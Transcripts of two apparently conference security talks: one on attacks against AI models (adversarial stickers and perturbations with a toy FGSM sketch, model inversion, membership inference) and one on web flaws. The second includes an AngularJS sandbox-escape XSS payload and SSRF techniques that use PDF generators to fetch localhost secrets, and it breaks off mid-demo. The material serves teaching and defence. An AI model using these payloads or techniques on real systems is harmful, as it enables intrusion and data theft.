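Before the examples, the mechanism can be made concrete with a minimal sketch against a linear classifier rather than a real neural network. The weights and "pixels" are invented; the point is that many tiny, targeted nudges, each bounded by a small epsilon, add up to a flipped decision, which is the same mechanism FGSM-style attacks exploit in deep models.

```python
def linear_model(weights, bias, x):
    """Toy image classifier: score > 0 means 'stop sign'."""
    return sum(w * xi for w, xi in zip(weights, x)) + bias

def sign(v):
    return (v > 0) - (v < 0)

def perturb(weights, x, eps):
    """FGSM-style step: nudge every pixel by at most eps in whichever
    direction pushes the score down. Each individual change is tiny."""
    return [xi - eps * sign(w) for xi, w in zip(x, weights)]

weights = [0.8, -0.6, 0.5, -0.4, 0.7, 0.3, -0.5, 0.6]   # made-up model weights
bias = -1.6
x = [0.9, 0.2, 0.7, 0.3, 0.8, 0.5, 0.1, 0.6]            # a 'stop sign', as 8 pixels

print(linear_model(weights, bias, x))        # positive: classified as stop sign
x_adv = perturb(weights, x, eps=0.1)
print(linear_model(weights, bias, x_adv))    # pushed negative: decision flipped
print(max(abs(a - b) for a, b in zip(x, x_adv)))  # no pixel moved more than eps
```

Against a deep network the sign of the gradient replaces the sign of the weights, but the budget argument is identical: a perturbation invisible to humans can still sum to a large change in the score.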

So I'm going to talk about this attack that we see on the right-hand side. This gentleman in the top left picture, right? Using a state-of-the-art (at the time) facial recognition AI, he was correctly identified as himself. When he put on the funny glasses, he was identified as Milla Jovovich. One of the interesting things about this attack is that this is called a targeted attack, and there's a couple of different use cases we can think of. The first one is in a far-future dystopian place, where surely this would never happen in real life, but imagine if you had facial recognition technology at airports that looked at your face and compared it to the faces of known

wanted people. And if there was a match, then you weren't able to board the plane and the marshals came and got you and made your day very bad. In that case, a bad actor wouldn't really care who the AI thought he was, as long as the AI didn't think it was him or her, or perhaps another bad actor. The point is that it doesn't have to target any specific person. It can just be anyone but me. And that's called an untargeted attack. But this is actually a targeted attack. Those glasses are Milla Jovovich's: when he puts them on, it's always Milla Jovovich. Not random. A specific pattern on those glasses. And those are just an inkjet printer cutout glued onto drugstore glasses. Not very high

tech, right? It convinces the AI that it's Milla Jovovich. On the right-hand side, we see a stop sign with some stickers on it that make the model think it's a 45 speed limit sign. And I don't want to confuse anybody: this is not model poisoning. This is not like the signs we talked about a slide or two ago; it's completely different. We did not poison the model here. This is just the way that this computer vision AI worked. The way it makes its decisions about the difference between a stop sign and a speed limit sign is subtle, more subtle than we may think, and it can be tricked by putting just a few stickers on, by making small alterations. This is

just the way these neural networks work. So how do we exploit this? Should we just put a bunch of stickers on, or try different colors, and see what happens? You can. Let me know how it works. Or we can use a lot of the available toolkits that are out there, built by people who have already discovered these attacks, to help us. By all means, finding new attacks yourself, that is super cool. But to get started, if you're new to this, we're going to talk about a couple of tools we can use later on. But I want to talk a little bit more in depth about an adversarial perturbation, because this is often what it looks like right here. Now these are read left to right, not up and

down. So in the top left we have the Alps. It kills me that whatever AI this was in this research paper could not only correctly identify the white bit as a mountain, but as the Alps mountain chain. That is unbelievable, especially with that degree of certainty. Plus this adversarial perturbation, which we generate as a bad actor, as an attacker, as a security tester, right? We overlay one onto the other and we get the input on the right. That is called an adversarial example, the image on the right. We create it by adding the adversarial perturbation, and we get this kind of snowy figure to the right. In the

lower right, on the puffer fish that's now a crab, it's hardly noticeable. One of the things I've started to notice is that Google's CAPTCHA looks like this sometimes now. And I don't know if they're training their models to ignore adversarial perturbations or not, but I can imagine: if it says click all the buses, and adversarial perturbation has been applied to those pictures, right, they can learn what a picture of a bus with an adversarial perturbation applied looks like, and they can label it that. So if they ever see a bus with that adversarial perturbation, they know not to trust the classification. They may be training, I don't know if they are, but it occurred to me when I saw that, that perhaps they're training

their model to see adversarial perturbations, which is a way to actually increase your robustness. It's not a great way, because unfortunately the workaround is you just add another adversarial perturbation on top and it does the exact same thing, and then you get into this game of how many layers deep are we going to go. Depending on your use case, it may be feasible, it may not be. I love this: dog, 99.99%. I wish I could get an AI to be that certain. If I saw that, I would think my model was overfit. I don't even know if I would trust it. But anyway, 100 percent, that is a crab. A little bit odd. But anyway, the technology they're talking about is sound; the adversarial perturbations do work. And because they operate on the way computer vision models themselves work, they're very hard indeed to mitigate. The best thing to do is to test this yourself so you know your risk before you deploy, and we will talk about how later. But first, I want to talk just a little bit about data privacy, no, not data privacy, model privacy. So this is weird. If I told you, hey, your model may be leaking training information, you may not think that that's that strange. But if you know a lot about AI, you might look at me like I was an idiot, because the training data is not located anywhere in the

AI. You can actually delete the training data; once the model is trained you don't need it anymore. It's not like the model is checking against the training data or talking to it. It's not. If you were to run a debugger on the model, you wouldn't see any information from the training data there. All you would see are the weights it put on each neuron, on each decision it made. It's a coefficient, a number. It's not representative of the data; it's representative of the decision, or of the feature. So even though

the training data isn't located anywhere in there, nonetheless there are certain circumstances in which your model may leak training data. I'm not going to lie, this is not that common. This is kind of a fringe example, but it is important to know these things exist, because you never know when the next big thing might blow up, right? It requires a very precise set of requirements, and one of them is returning a confidence score. When it said crab 100%, that's a confidence score. And if you return that to the user when the user asks you to classify something, it can be used against you. So the upshot is, if you don't have to return

a confidence score, don't, because this can happen. Basically, if you have this guy's name, I'm going to call him Kyle, Kyle here on the right, and you have a model

that returns, when you give it a picture, a name and a confidence score, like it's 50% sure that this is Bob and 20% sure that this is Sue or whatever, I can basically just send it random stuff until it thinks it's, like, 0.001% Kyle. And then I can take that and start building off of it, right? Taking that small percentage and optimizing for a larger percentage until I come close to the original picture. So I add a squiggle here, a squiggle there, and now I'm at 2%. Oh, great. So I keep those and I keep adding on to them using a specific technique. And we come up with the

kind of general idea of the pictures on the left and right, kind of scary images. This is known as model inversion. And it's especially disturbing when it's teamed with a concept called membership inference. Membership inference, I would imagine, is kind of big in the OSINT world, but what it means is that if you take one set of data, like the training set, and you combine it with another set of data, right, it becomes quite powerful. You don't need that much information to positively identify someone. If we look at the example on the right, from this white paper, we can see that a publicly available voter registration list, available for purchase, contained all this information, including ZIP code, birth date, and sex. And if we match

that ZIP code, birth date, and sex against medical data, we can kind of glean the name and address of the people in the data, because not that many people share the same ZIP code, birth date, and sex. You wouldn't think it'd be that precise, but the confidence scores are actually rather high in this example; you can't be 100% sure, but rather high. So that's membership inference, and when it's teamed with model inversion, it can mean some pretty nasty stuff. This is still a little bit fringe, and it does require a very specific setup in the environment. Hopefully that was super helpful, or interesting at least. I think it's kind of exciting, personally. And I put further

considerations at the end, and I didn't talk a lot about them. Not because they're not important, but because I didn't want to scare anybody away from the third takeaway, which is: there are things we don't normally talk about when we talk about information security in the context of AI, and we should. I'm going to make the argument that explainability, ethics, and fairness should be the job of the information security professional, of the people who are doing AI security. The biggest reason for that is nobody else is right now. And that doesn't mean that people don't care. Tons of people out there are doing great work on this, tons of great research, just not all of them from an information security

background. It's more like, if you were to go to someone in your company and say, hey, who's responsible for making sure that we're only releasing ethical AI? Who talks to the vendors of the applications that we're using that use AI? Who's making sure that those vendors are enforcing fairness and ethics standards? If you do that, I would love for you to email me what their answer is, because this is so new, not a lot of people are paying attention to it, and it's a big deal. It doesn't matter how secure your AI is, how well you're protected against adversarial perturbations and model inversion, if your AI is out there doing things an AI shouldn't be doing in

the first place, right? Or if your AI is making unfair decisions. Let's talk real quick about explainability. Explainability is a bit of a contentious issue. What it means is that if your AI makes a terrible decision that puts you in the news, and somebody comes to you and says, how did this happen, why did your AI choose this? If your answer is something like, I don't know, or nobody knows, or "because stats," or "because probabilities," it's not really a great answer.

Explainability is about understanding the features, what features went into the model, and how your model used those features to reach a decision. It sounds pretty straightforward, but it's kind of contentious, because not everybody, and I'm actually one of them, not everybody likes the idea of calling it explainability, because it doesn't really explain much. If I tell you, well, it thought this was a hot dog because it's kind of red like a hot dog, and it's kind of long like a hot dog, and I know because I've researched this, and AI explainability is very important to me, so I know that these are the two biggest features my AI uses to make a determination about whether or

not it's a hot dog. Honestly, that doesn't really explain much. Well, what is long? And how red does red need to be, right? And the more you dig in, the more and more vague your answers get, because the real answer is, like, stochastic gradient descent and hard things, right? Things that we don't always necessarily understand 100%. And calling that explained is misleading. But my stance is that an explanation that gets you closer than nothing, that is more accurate than nothing, is better than nothing, right?
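A crude illustration of that "better than nothing" analysis: wiggle each feature of one input and watch the score move. This is only the intuition LIME builds on, not LIME itself (which fits a local surrogate model around the input); the hot dog scorer and its three features are invented for the example.

```python
def hot_dog_score(features):
    """Hypothetical black-box scorer: we can call it, not read it."""
    redness, length, cheese = features
    return 0.7 * redness + 0.5 * length - 0.2 * cheese

def attribute(model, features, eps=0.01):
    """Crude local attribution: bump one feature at a time by eps and
    measure how much the score moves per unit of change."""
    base = model(features)
    influences = []
    for i in range(len(features)):
        bumped = list(features)
        bumped[i] += eps
        influences.append((model(bumped) - base) / eps)
    return influences

influence = attribute(hot_dog_score, [0.9, 0.8, 0.1])
print(influence)  # roughly [0.7, 0.5, -0.2]: redness matters most, cheese counts against
```

For this toy linear scorer the attribution recovers the weights exactly; for a real model it only describes behavior near this one input, which is exactly the "local" caveat that makes explainability contentious.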

My stance is that you should be able to do some elementary analysis and understand. You should know what your features are in the model, and you should understand how the model uses them. One of the tools you can use for this is LIME analysis. LIME analysis does just that: it tells you what features played into each decision. Another problem with explainability here: "AI explainability is very important to me, so I've done this complete LIME analysis, it should answer all your questions." Okay, well, how does the LIME analysis work? You get into the exact same problems. How does the LIME analysis know? You get into the exact same problem. So explainability: a bit contentious, but something's better

than nothing. Ethics and fairness. There are a couple of different flavors of this, right? The biggest ethical issue is: should AI be making this decision at all, or should a human being? Is there a human in the loop, so to speak, or does the AI make decisions by itself? And if so, is that okay?

Like I said at the beginning, there's a difference between AI making a mistake and a person making a mistake. If a person makes a mistake, you can say, Bob, you made a mistake, and we're going to make sure you don't make this mistake again, one way or the other. If AI makes a mistake, who's responsible for it? You don't always have attribution with AI. And sure, people will try to get out of blame, but we all still kind of know, right? AI adds a layer of abstraction that's sometimes very difficult, especially if, oh, we didn't even make this AI, we bought this AI from AIs-R-Us, you know? It can get pretty difficult. And if you're using AI to do something that affects

people's lives, and you don't understand how that AI works, you're putting yourself in a very precarious position. And we've seen this before. Unfortunately, this has really affected people's lives before. There is one example you can look up, about an AI that was used in the criminal justice system. It was used to basically

rate recidivism, the odds that someone would commit a crime again were they released on parole. So this AI was making suggestions, recommendations, about who got parole and who didn't. And it was a pretty racist AI, unfortunately. The AI learned from actual parole cases, right? The unfortunate part about that is the inherent bias in law enforcement, and in the justice system, I should say, excuse me. Racism in the justice system was used to train this AI, and you got a racist AI out of it. Yeah, it's bad for people to make decisions based on this, but I maintain that it's even worse if AI does,

especially if people don't understand that that's how it works. We need to be very careful about whether AI should be making these kinds of decisions at all. We need to understand what happens if this doesn't work the same for everybody, right? What if only a certain population is able to receive the benefits from this AI because of the way they look, or because of some other protected feature, things like that? Really, that is the most important part, and that's the third takeaway: information security professionals, this should be in our domain and under our program. Almost last, how do we actually go about fixing this? This is really going to be the

subject of my next talk, so I'm not going to give it all away here, but I do want to give a little teaser that it begins with a comprehensive risk assessment. It involves really understanding those features and how they're used in AI. It involves understanding the models that are being used and how they're being used. Once we've done a lot of that research, we then start actually testing robustness, inversion, all these things we've talked about, and understanding what our risk is. And then we continue to monitor as it's in production, as it does its inference to see if it's behaving correctly. That is pretty much all I've got. I've had so much fun talking with you about all this fun stuff.

Before I go, this is my email address. Reach out to me if you're curious about this, or if you're a professional doing this. If I've made a mistake, hit me up in the Q&A or hit me up on my email and give me both barrels. arXiv.org is where a lot of these papers are released, where you can get the primary documents, the actual source documents, and not some article about the documents; the actual white papers are there. The IBM ART toolkit, the Adversarial Robustness Toolbox, is a very simple toolkit. It's a library. You use Python, which is what a lot of people code in to do AI, and basically you just tell it what attacks you want to run against a model,

and it goes to town. It's very cool. I've used it and recommend it. The IBM ART developers have a Slack that you can join to ask them questions. Another one that was recently introduced to me is PrivacyRaven, and that uses PyTorch, which is a higher-level layer of abstraction, so it makes doing AI a little bit easier, one might say. I know the author of PrivacyRaven is looking for feedback on what else it can do, how it can be improved, and how people are using it, so definitely give that a try. There are tons of other ones, Foolbox is out there, CleverHans, but I wanted to bring these two to your attention.

XAI is a buzzword; it's explainable AI, and it's a great term to Google. XAI will get you right where you want to be in talking about explainability. Fairness, accountability, and transparency: Google has a good document and Microsoft has a good document. Both of them are looking into this and coming up with ideas on how we can get a handle on accountability and transparency. Finally, the AI Village at DEF CON. They have a Discord. Hit them up on Twitter, get information about the Discord, join the Discord, join the discussion. These are really smart folks who are right on the cutting edge of this research. And they're good people and great

to know and to have as resources to discuss AI security with. And with that, that is my time. I, again, just really appreciate this opportunity to talk again at B-Sides DFW. Thank you so much for attending this. I hope it was exciting, maybe interesting at least, maybe useful. But in any event, I really appreciate all of you. Thank you so much. And I'll see you later. Bye bye.

Hi everyone, my name is Kerry Hooper. I'm here to talk about some modern web application vulnerabilities. First off, thank you to the B-Sides DFW staff. I really appreciate you all. And also I appreciate you, the viewer. Thanks for coming and thanks for viewing my talk. First, who am I? As I said before, Kerry. I also go by Hoop. I'm on Twitter at NoPantRootDance. I'm a red team analyst. I have some offensive security certifications, also the CISSP. I like fishing, both types, and some golf, and I love building things, whether virtual or physical. So why have this talk? Why listen? Why care? Over the last year, I've done some deep dives into some modern web application

vulnerabilities, specifically things that I've seen both in the wild and at clients. I wanted to have a deeper understanding of these bugs and also the applications themselves. I ended up building a platform. I like Python, so I built a vulnerable platform in Python in order to implement some of these bugs, because in order to better understand them, I figured I'd want to build them myself and play around with them. Also, I'd come home every night with my mind filled with the OWASP Top 10, injection, cross-site scripting, all these new vulnerabilities I was learning, and I wanted to share with my significant other. She had no idea what I was talking about. So I decided to build these into some sort of demo application

to showcase them to her and better explain what I did, how I did my work, and what I was excited about when I came home. So for the demonstrations I'm going to give today, I built them into this web server. It's on GitHub at the link below, and I'll distribute it in the Discord server as well. This is a program written in Python, specifically the CherryPy module. There's some JavaScript and HTML in there, but it's mostly Python. There are three PDF modules that were utilized, and we'll get into more of those later. So that's what you'll need at home if you decide to replicate these bugs. But I've also built it into a Docker container; it's on Docker Hub if you'd like to

take a look. So what are we going to talk about? The first is AngularJS template injection. Second is unsafe PDF generation. And the third is the bootstrap man-in-the-middle vulnerability, and also the importance of HSTS, which is the HTTP Strict Transport Security header, and HTTPS everywhere. More and more, there are three main application security trends. One, the reliance on client-side frameworks, hence we'll talk about XSS and AngularJS. Two, more and more reliance on integrating third-party tools. Server speeds are getting faster, and they're getting cheaper and cheaper as companies move to the cloud, so server load isn't as much of a big deal anymore as it was 10

years ago. Therefore application designers can pull in these third-party modules without any additional decrease in the speed or efficiency of the application, and we're seeing a lot of this plug-and-play behavior, especially the generation of PDFs, which I've seen more and more as I've investigated this vulnerability. Three, as the network attack surface shrinks and network security perimeters become more hardened, we will see more and more client-side attacks, as evidenced by the Data Breach Investigations Report from Verizon. Phishing is becoming a greater attack vector, but I believe we'll also see more man-in-the-middle attacks, especially with all these misconfigurations. So let's get started. AngularJS: who's heard of it? I'm going to give a chance for all of the hands

to get raised. I see some hands. I see some virtual hands. There we go. So AngularJS, for those of you that might not know, is a front-end JavaScript library. What you really need to remember is that it makes things pretty. It makes things beautiful in the browser. It runs client-side, in the browser. It's also open source and was created by Google in 2010. It is different, though, from technologies such as Angular, Vue, and React, although they do very similar things. They're all generally MVC frameworks, model-view-controller frameworks, and they run in the front end, in the browser. Now, it's very confusing: AngularJS is not to be confused with Angular. And when I talk about these vulnerabilities, all these vulnerabilities are specifically

in AngularJS. When I say AngularJS, it's everything below version 2.0; Angular is everything above 2.0. And there's a big difference between the two. It's not easy to upgrade at all; it's actually a complete revamp of the framework, and that actually contributes to why this vulnerability is still present in a lot of web apps today. Some of you might have been on developer teams upgrading from jQuery, or upgrading from PHP 5 to PHP 7; it's a big deal. It might be difficult to upgrade. It might be, more importantly, costly for application teams to upgrade. And everything breaks if you try to use the new framework; you really have to rewrite things from the ground up. So as a result, development

teams will use this older framework, even though it has some of these weaknesses. Once I knew what AngularJS was and started looking for it, I would find about 50% of the time they'd be using the newer version of Angular, and 50% of the time the older version. All right, let's discuss templating as well. Angular uses this concept called templating, and we can use this as an example of what Angular might look like. Say you right-click in the browser and view source: what exactly are you looking for? One, AngularJS will have ng directives, and they'll look like those attributes. If you look at the body tag, ng-app, ng-controller, these are all attributes that key the AngularJS library in to pay

attention to those. You'll also see some script imports. In this case, it's importing the AngularJS script, as well as references to app.controller or scopes. All these are Angular-like things, and you may also see them in the other front-end frameworks too. That's how you know you're dealing with this MVC framework. You'll also see these templates, which are delimited by those curly brackets surrounding "message" in this case, and we'll talk a bit more about how templating works. So, template injection. These templates are present within the page, and the JavaScript library replaces them on the fly with that JavaScript logic. Some of you may have heard of server-side template injection, maybe, maybe not. If you haven't, I encourage you to look it

up; look it up on PayloadsAllTheThings, or Google it, there's a ton of good write-ups on that. Essentially, in server-side template injection, user input is handled unsafely by the server-side templating engine. Some examples of these engines would be Twig, Jinja2, or Velocity. Client-side template injection is the exact same thing: untrusted input is being handled by that client-side library, by JavaScript, and it's being executed by the templating engine. So the result of server-side template injection may be as bad as what? I'll give you a chance to think in your heads about what it might result in. Some of you might know: RCE, remote code execution. You can execute code on the server. In contrast, with client-side template injection, remember, it's JavaScript only. If you can execute

JavaScript, the result is going to be cross-site scripting. So through this injection technique, we're able to inject JavaScript into the client browser — into the victim's browser — a lot like reflected or stored cross-site scripting. Putting it all together, AngularJS template injection deals with templates: there are certain expressions delimited by those double curly braces, and they're replaced at runtime — the JavaScript library is accessed, and the object and its attributes are evaluated on the fly. Now, this attack was introduced by Mario Heiderich in 2016 — he also works for Cure53. Six years after this front-end framework was created, Mario came up with this injection technique. And the reason it works is that he was able to access objects within JavaScript and draw off their

primitives in order to construct payloads that would result in client-side code execution. The AngularJS team maintained a sandbox to help prevent some of these attacks, which attempted to limit the scope in which these JavaScript objects could operate. For those of you who might not know what a sandbox is: it essentially limits the scope that these Angular expressions have access to, so they couldn't reach any of the critical objects such as the document or the window.
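The sort of expression the sandbox tried to block is well documented in public AngularJS sandbox-escape write-ups; the canonical shape (reproduced from those write-ups, not from the talk's slides) looks like this:

```html
<!-- Evaluated by AngularJS inside a template: constructor.constructor climbs
     from a plain scope object up to the global Function constructor, builds a
     new function from the string, and calls it. It works wherever no sandbox
     (or a broken one) stands in the way. -->
{{constructor.constructor('alert(document.domain)')()}}
```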

Since the sandbox was created, there were multiple, multiple sandbox bypasses. I've got this link — I'd encourage you to take a look at this article. Great article, containing all of the known sandbox bypasses for AngularJS, at least all the ones that I know of. Now, I don't pretend to know exactly what all of this JavaScript means. Jann Horn created one that bypassed the sandbox in 1.2, Gareth Heyes in 1.3, and Ian Hickey in 1.5. All of these were just ways of breaking out of that sandbox context in order to access those primitive JavaScript objects and execute code. I would highly recommend Gareth Heyes' BSides Manchester 2017 talk. Awesome explanation if you guys are interested

in more research. Finally, the version 1.6 bypass came out. Mario Heiderich, the original discoverer of the attack, came up with this primitive bypass — constructor.constructor — which was the nail in the coffin for the AngularJS sandbox. And actually, after this, the AngularJS team didn't implement the sandbox anymore; they basically threw it in the garbage. So why were they able to bypass this in so many different ways? Mainly because JavaScript is weird. JavaScript is so weird — anybody who has programmed in JavaScript knows this. Brian Hysel presented this topic at BSides Augusta 2018, and he talked a little bit about quoteless strings and JavaScript types. In the top box there's the exclamation point with two square brackets, ![]. JavaScript interprets that as the

Boolean value false. It interprets plain square brackets, [], as an empty array, which coerces to an empty string. And he showed that by concatenating them — by adding ![] and [] together in JavaScript — you actually get the string "false". Yeah, JavaScript's weird. With the string "false" you can then access the string primitives, or the string functions — you can call the fromCharCode method — and there are many, many different ways of executing arbitrary JavaScript code from there. Someday I hope to understand exactly why all of these are the way they are. If you know, let me know — I'd love to learn. Just understand: JavaScript is really weird, and many times there are dozens of ways to accomplish the same thing. So that's why

there are so many sandbox bypasses. The sandbox was eventually abandoned, and the AngularJS team said that it wasn't actually meant to provide 100% security anyway. As for remediation — we'll talk about that after the demo. So this is my AngularJS app. It's a hello-world-type app that takes in one parameter from the URL, a GET parameter, and places it within the DOM. Pay attention to those three red boxes — these are hallmarks of an AngularJS app. You've got the ng directives, you've got the Angular import, and you've also got references to controllers and scope.
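Taken together, those hallmarks look roughly like this in page source — a hand-written sketch, not the demo app's actual code:

```html
<!-- The three giveaways: ng directives on the tags, the AngularJS script
     import, and references to a controller and $scope with a {{ }} template. -->
<html ng-app="demoApp">
  <head>
    <script src="angular.min.js"></script>
    <script>
      angular.module('demoApp', [])
        .controller('demoCtrl', function ($scope) {
          $scope.message = 'hello';
        });
    </script>
  </head>
  <body ng-controller="demoCtrl">
    {{message}}   <!-- replaced at runtime with the value of $scope.message -->
  </body>
</html>
```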

You can also detect this with a really cool tool I want to introduce called Wappalyzer. It's been around forever — some of you who are pen testers might know about it — but it's a browser plug-in for both Firefox and Chrome, and it can detect exact versions of certain things running on websites. It's great if you're doing bug bounties as well. Anyway, this application takes in untrusted user input and puts it directly into the page. Some of you might see this and automatically think, hey, that's some reflected cross-site scripting right there. Let's test it out. All right, I'm going to mirror the screen.

And let's check out the demo. So I've got the demo here — this is the app running on localhost. As I refresh the screen, you might be able to see those templates flashing within the page: for that split second, the JavaScript hasn't executed yet and the template is visible to the eye. So we've got some reflection going on — Burp Suite would call this input reflected within the HTML. We can change the name parameter in order to change the name that's presented in the page. But what evil things can we do with this? Well, some people might try putting in a script tag to try to execute JavaScript. But as we see, the script tag didn't execute; it was just reflected in the page. Looking at the source, we will

see that the application has some input sanitization in place. It's actually sanitizing those angle brackets, replacing them with HTML entities like &gt; — ampersand, g, t, semicolon. So how do we get around this? We can get around it with AngularJS XSS. By crafting this AngularJS payload for version 1.6.9, we can execute an alert within the application, whereas we wouldn't have been able to with the standard payloads.
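The reason that works can be sketched in a couple of lines (my own function name, not the demo's code): HTML-encoding angle brackets stops script tags cold, but it never touches AngularJS's double-curly-brace delimiters.

```javascript
// Sketch of why classic XSS sanitization fails here: encoding angle brackets
// neutralizes <script> tags, but leaves {{ }} template delimiters intact.
function htmlEncode(input) {
  return input.replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

console.log(htmlEncode('<script>alert(1)</script>'));
// → &lt;script&gt;alert(1)&lt;/script&gt;  (inert in the page)

console.log(htmlEncode('{{7*7}}'));
// → {{7*7}}  (unchanged — AngularJS will happily evaluate it)
```

Anything that survives sanitization and still lands inside Angular-controlled DOM gets evaluated as a template expression.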

All right, moving back to the presentation. Extend.

Are we good? Cool. All right, so what happened? We weren't able to use those standard payloads. The sanitization was meant to mimic PHP-type functions like htmlspecialchars or htmlentities, which would normally sanitize that user-supplied input effectively. But because of this front-end technology, we were able to bypass those traditional cross-site scripting remediations and actually execute script within the context of the user. So let's talk about remediation. User input is always evil — that's a hallmark of application security. You know, I think six out of the ten OWASP Top 10 categories deal with untrusted user input. And when I talk about user input, I'm talking about everything — not just parameters, but cookies, user agents, headers, everything. Everything

should be untrusted until it's properly sanitized and vetted. The more I learned about this front-end framework, the more I tested for client-side template injection and AngularJS XSS. And I started seeing it everywhere. Maybe it was attribution bias, maybe not, but I started seeing this in app after app after app. I even saw this in one of the technology giants' flagship apps — I found client-side template injection there. Normal sanitization doesn't always work to remediate these, and that's why front-end frameworks have to be kept in mind. User experience is always king, and it's going to contribute to these front-end frameworks being used more and more in the future. So: user input is always evil. That's one of the themes of

this talk. Next I'd like to talk about the next class of vulnerability: unsafe PDF generation. This wasn't intuitive for me at first, but again, much like AngularJS client-side template injection, once I saw this and understood the vulnerability, I saw it more and more in applications all over — both in my organization and on the internet. As server resources become less of a constraint, web application complexity has been increasing and increasing. A developer gets a sticky note on the to-do board, and it's so much easier to just plug and play a third-party library to get that functionality within your app rather than build it from scratch. So I believe we're going to see more of a reliance on this, especially for something

as complex as PDF generation, which may require the parsing of websites and HTML.

However, pulling in these third-party libraries may also pull in security bugs, or short-sightedness from the developers and the security teams — maybe they didn't think about the whole picture before including them. In order to talk about this, we first need to discuss server-side request forgery. I know many of you may be familiar with this already, but I'd like to cover it just to make sure we're all on the same level. Typically in a server-side request forgery, the client or the browser is able to send a certain request to the server and cause that server to make some other request — usually an HTTP request. So if I can contact a web server in the cloud and cause it

to make an HTTP request, that would be an example of server-side request forgery. So what can you do with this? You can bypass firewalls, you can scan ports, you can access localhost data — sometimes secrets, sometimes AWS metadata. This was showcased in the Capital One breach a couple of years ago: Capital One's cloud account was essentially taken over via a server-side request forgery. SSRF can be incredibly powerful. I believe it falls under the OWASP Top 10, specifically A1, injection. And Orange Tsai really took this to the extreme to demonstrate how big of a deal SSRF can be, in the form of protocol smuggling.
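Stripped down, the vulnerable pattern is easy to picture — a sketch with hypothetical names, not code from any app in the talk: the server fetches whatever URL the client hands it.

```javascript
// Sketch of the vulnerable pattern behind SSRF: the handler fetches whatever
// URL the client supplies, so the client steers the *server's* outbound
// requests. fetchImpl is injectable here only to keep the sketch testable.
async function fetchForClient(requestedUrl, fetchImpl = fetch) {
  // No allow-list or scheme check, so requestedUrl can just as easily be
  // http://localhost/admin or http://169.254.169.254/ (cloud metadata).
  const response = await fetchImpl(requestedUrl);
  return response.text();
}
```

The fix is the mirror image: resolve the target and check it against an allow-list before the server ever connects.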

I encourage you to take a look at his blog after the presentation. This is one of the screenshots from it: he's able to chain together four different weaknesses to get code execution on the remote server. I don't expect you to understand all of this; I'll just give you the high notes. The first bug, in red, is a harmless SSRF. It's constrained — that is, the

URL-encoded resource was just kept as such and wasn't treated as bits and bytes; it wasn't URL-decoded. However, he was able to chain this with a second SSRF bug, in light blue, and that was the good one — an unconstrained bug. Using that unconstrained SSRF, he was able to manipulate the request with URL encoding; the URL-encoded bytes were decoded by the server, he was able to smuggle an additional protocol in, and that eventually resulted in unsafe deserialization in a Ruby gem. I highly encourage that blog post — one of the best I've seen. Next: two security researchers who both worked for HackerOne at the time (not sure if they still do) presented on

this topic at DEF CON 27: Owning the Clout through SSRF with PDF Generators. This was Ben Sadeghipour, aka NahamSec, and Cody Brocious, aka Daeken. They did a really good job — I'd encourage you to take a look at that talk; it's on YouTube as well. They tell a story about how they were able to hack a ride-sharing app. They found that the ride-sharing app gave them invoices in the form of PDFs, and their user input was taken, trusted, and put into that PDF, so they were able to manipulate the HTML that was being rendered. They figured that if they could manipulate the HTML, they could possibly inject script tags or break out of style tags. And

eventually they found the SSRF. They read the manual extensively on the actual PDF generator they identified — which I believe was WeasyPrint, the one they exploited — and they found these bugs. They were able to own the entire cloud environment by accessing the metadata. I strongly encourage watching their talk. There are many PDF generators online — just Google free PDF generation. There's a good chance those PDFs are being generated on the server side, and I would guess that many of the generators are vulnerable. PDFs are everywhere. Users love PDFs, application teams love PDFs — I guess our society is just in love with PDFs. I see them everywhere. How does it work, generally? Well, in order for a PDF

to be created, either an image is going to be put into the PDF format, or the generator is going to render HTML. And there are two ways to do the latter: one with an HTML renderer and one with a headless browser. We'll get into both in the next slide or two. Just a quick Google search for free PDF generator — what do we get? 242 million. That's a lot of results. So, the difference between a headless browser and an HTML renderer: a headless browser is essentially a browser without a GUI. Some of you might have heard of Puppeteer, or Headless Chrome — those are the ones that come to mind. And it typically executes all the JavaScript to correctly render the page. On the other hand, an HTML renderer parses the HTML

without the full logic of a browser engine. And typically — I say typically because sometimes they do — it doesn't execute JavaScript. However, for both of them, when they're rendering PDFs, untrusted HTML is bad: at a minimum, parsing untrusted HTML can result in SSRF. And XSS — cross-site scripting, the execution of JavaScript in an app — may turn into JavaScript execution on the server side, which has some strong implications; technically that would be remote code execution. I've got three examples I want to walk through and demo. The first uses an open-source library called wkhtmltopdf — that's the app running in the background — and it uses

a rendering engine called Qt WebKit. We can use an image tag: if we inject an image tag, we can invoke an HTTP GET — after all, it has to reach out and grab that image in order to include it in the PDF. So if we have it reach out to a server under our control, we can reveal the user agent. For this, I developed a quick-and-dirty Python script, echo_useragent.py. It's on GitHub if you want to steal it or make it better. I'm going to use it in this demo to show that we can reveal the back-end server-side PDF generation technology through that user agent, by causing an SSRF to a server we control.

Here's an example of this — specifically, it shows wkhtmltopdf within the user agent, and sometimes it even gives a version. We're going to do both of these. So what else can we do? Let's show in a demo how bad this can be. I'm going to take it off presentation mode. Let's go. One sec, please. Let's check out this pwnage via PDF generation. Here's the app: create a PDF, generate a PDF. In this case, the app shows the front-end technology, wkhtmltopdf — however, most applications won't actually do this. So let's catch the user agent in order to figure out what we're dealing with. First, you might test the functionality and see what happens. In this case, as is the case that I've

seen a lot, the PDF will be stored on the server. When the PDF is not stored on the server, I've also seen it stored in the cloud in some sort of storage bucket, be it AWS, Azure, or Google Cloud Platform. So let's test this with a primitive payload to invoke that server-side request forgery. Name it test2. We've got an h1 tag — in HTML that's a header, right? It should be big and bold. And then we've got the image tag down below, and the image tag contains a reference to an image online. In this case, it's a cat. Once we generate the PDF and look at it, we should see a picture of the cat. That tells us

that the server went out and grabbed that image of the cat and put it into that PDF — we just caused a server-side request forgery. And that's the most primitive form: just getting an image via an image tag. But we can build on that by requesting an image from a server under our control, and then we can see the user agent. So here we go. We're going to localhost, which I've got a listener on, on port 80. Capture the user agent. As soon as we generate that PDF, we should see the user agent. It'll be a whole HTTP request; all the script does is parse that request and print the user agent to the terminal. And here we go, there's the

user agent — there's wkhtmltopdf.

All right, but how can we take this further? What are we worried about — what is our nightmare scenario with server-side request forgery? Now, this is just an HTML renderer. What we can potentially do is access secrets on the server itself that may not be accessible to anybody externally — maybe not accessible to anybody except localhost. This is a way to exfiltrate secrets from localhost, but also from the intranet, because there's a good chance this server is in a DMZ and has special access to internal resources. We can do that with an iframe: we put the source of the iframe equal to a privileged resource — just for this demo, we had a /secret endpoint — and then we submit

